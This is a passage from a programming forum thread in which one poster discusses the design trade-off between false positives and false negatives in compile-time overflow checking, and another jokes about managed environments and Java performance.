Of course by improving the compiler and making it smarter you get less false negatives. For example; for that specific example the compiler could (e.g.) interpret/execute the loop during compile time to prove that the "x = x + 1" is perfectly safe.

Basically it comes down to a design choice. A compiler may:
  • guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
  • guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time

The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.

The second option is what most (all?) existing compilers do. This is less annoying for programmers when they're writing code; but extremely frustrating for programmers afterwards when they have to deal with bug reports despite the fact that they've spent ages writing 5 times as many unit tests. ;)


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 9:45 am 
Offline
Member
Member
User avatar

Joined: Wed Oct 18, 2006 3:45 am
Posts: 9301
Location: On the balcony, where I can actually keep 1½m distance
embryo2 wrote:
Managed environment employs a number of technics to control the software it runs. It means the environment manages the code. The forms of management are many and they differ one from another. The overall result of the technics employed is cost, speed and quality enhancement.
Good. I'll just add -O2 -Werror to GCC and run it in a VM. Wow, it's suddenly managed! :mrgreen:
Quote:
speed (...) enhancement
Java managed? Now that's the most silly thing I've heard in months :mrgreen:


Ahem.

I cast Hideous Laughter on myself and fail the saving roll.

_________________
"Certainly avoid yourself. He is a newbie and might not realize it. You'll hate his code deeply a few years down the road." - Sortie
[ My OS ] [ VDisk/SFS ]


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 5, 6, 7, 8, 9, 10  Next

All times are UTC - 6 hours


Who is online

Users browsing this forum: No registered users and 3 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group